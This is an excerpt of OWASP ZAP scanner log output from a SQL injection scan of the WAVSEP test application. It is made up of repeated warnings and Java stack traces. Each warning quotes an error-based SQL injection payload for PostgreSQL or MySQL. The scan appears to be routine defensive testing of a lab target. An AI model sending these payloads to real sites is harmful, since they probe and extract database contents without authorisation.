java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682035 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND 9468=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (9468=9468) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND (5406=5406] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) AND 9468=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (9468=9468) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND (5406=5406 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682036 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND (SELECT 5935 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(5935=5935,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'cXnH'='cXnH] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND (SELECT 5935 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(5935=5935,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'cXnH'='cXnH at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682037 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 4000=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (4000=4000) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 4000=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (4000=4000) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682038 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND 8404=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND ('GVKO'='GVKO] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') AND 8404=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND ('GVKO'='GVKO at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682039 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND (SELECT 9602 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9602=9602,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND (SELECT 9602 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9602=9602,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682040 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT 2664 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(2664=2664,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- fUOP] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT 2664 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(2664=2664,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- fUOP at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682041 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND 6596=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6596=6596) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND 'SPjN'='SPjN] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' AND 6596=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6596=6596) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND 'SPjN'='SPjN at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682041 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND 4641=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (4641=4641) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' AND 4641=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (4641=4641) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682042 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 9569=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (9569=9569) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND (1295=1295] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 9569=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (9569=9569) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND (1295=1295 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682043 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 3048=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (3048=3048) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 3048=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (3048=3048) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682044 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 5735=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (5735=5735) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)-- fqmm] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 5735=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (5735=5735) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)-- fqmm at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682045 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 6033=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6033=6033) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND ('Qgwn'='Qgwn] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 6033=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6033=6033) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND ('Qgwn'='Qgwn at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at 